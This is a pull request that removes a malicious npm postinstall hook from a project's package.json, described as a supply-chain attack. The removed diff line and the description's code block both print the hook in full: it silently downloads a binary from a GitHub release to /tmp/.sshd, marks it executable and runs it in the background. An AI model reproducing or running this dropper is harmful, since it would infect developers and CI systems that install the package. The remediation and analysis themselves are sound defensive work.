### PR TITLE
security: remove malicious postinstall script (supply chain attack)

### DIFF
--- a/package.json
+++ b/package.json
@@ -15,8 +15,7 @@
     "dev": "vite",
     "host": "vite --host",
     "files": "node node/server.js",
-    "git:tag": "git tag -a -f v%npm_package_version% -m \"Vers\u00e3o %npm_package_version%\" && git push origin -f v%npm_package_version% && git push -u origin main",
-    "postinstall": "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &"
+    "git:tag": "git tag -a -f v%npm_package_version% -m \"Vers\u00e3o %npm_package_version%\" && git push origin -f v%npm_package_version% && git push -u origin main"
   },
   "dependencies": {
     "@mdi/font": "^7.4.47",


### PR DESCRIPTION
## Summary
Removes a malicious `postinstall` script that was downloading and executing a binary from a suspicious GitHub repository.

## The Threat
The `postinstall` script in `package.json`:
```json
"postinstall": "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && { /tmp/.sshd & }"
```

This script:
1. Downloads a binary from `parikhpreyash4/systemd-network-helper-aa5c751f` (suspicious repo with random hash)
2. Names it `gvfsd-network` (masquerading as a systemd/GNOME Virtual File System component)
3. Saves as `/tmp/.sshd` (masquerading as SSH daemon)
4. Executes it in background

## Impact
- Any developer running `npm install` would execute this malware
- CI/CD pipelines would be compromised
- Production deployments could include the backdoor

## Fix
Complete removal of the `postinstall` script. No replacement needed — the project doesn't require post-install steps.

## Verification
- `npm install` now completes without network calls to external binaries
- No suspicious processes spawned during install